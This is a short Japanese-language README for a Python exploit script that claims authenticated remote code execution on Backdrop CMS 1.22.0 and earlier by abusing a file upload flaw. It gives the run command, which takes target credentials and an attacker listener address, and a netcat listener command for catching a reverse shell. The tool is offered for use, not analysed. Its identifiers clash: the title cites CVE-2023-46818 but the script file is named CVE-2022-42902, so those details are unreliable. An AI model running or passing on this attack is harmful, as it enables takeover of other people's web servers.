
CVE-2023-46818 Backdrop CMS <= 1.22.0 向け Python3 エクスプロイト - 認証済みリモートコマンド実行 (RCE)
この Python エクスプロイトスクリプトは、Backdrop CMS における無制限なファイルアップロード脆弱性を狙い、リモートコード実行 (RCE) を達成します。
バージョン 1.22.0 およびそれ以前のバージョン 注: Backdrop CMS はこの脆弱性を否認しており、高度な権限が必要であると主張しています。そのため、1.22.0 より上のバージョンでも存在する可能性があります。おそらく、まず管理者アクセスが必要だという意味でしょう。それでも、これは有効な脆弱性であり、システム全体を制御するために確実に悪用される可能性があります。
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
重要: スクリプトを実行する前にリスナーを起動してください:
nc -lvnp <listener_port>
